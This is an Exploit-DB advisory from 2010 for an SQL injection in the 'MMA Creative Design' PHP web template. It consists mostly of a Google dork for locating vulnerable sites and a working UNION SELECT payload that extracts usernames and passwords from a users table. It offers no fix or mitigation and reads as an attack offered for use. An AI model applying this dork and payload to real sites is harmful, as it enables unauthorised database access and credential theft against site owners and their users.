MMA Creative Design - SQL Injection

EDB-ID:

12706

CVE:

N/A


Author:

XroGuE

Type:

webapps


Platform:

PHP

Date:

2010-05-23


=========================================================
MMA Creative Design SQL Injection Vulnerability
=========================================================
##########################################
# Name: MMA Creative Design SQL Injection Vulnerability
# Date: 2010-05-23
# vendor: www.mmacreative.com
# Author: Ashiyane Digital Security Team
# Discovered By: XroGuE
# Contact: Xrogue_p3rsi4n_hack3r[at]Hotmail[Dot]com
# Home: www.Ashiyane.org
##########################################

[+] Dork: intext:"Design by MMA Creative"

[+] Vulnerability: http://[site]/[path]/page.php?id=[SQLi]

[+] Demo: http://server/authors.php?id=-999+UNION+SELECT+1,2,group_concat(id,0x3a,username,0x3a,password),4,5,6,7,8,9,10,11,12+from+users


##########################################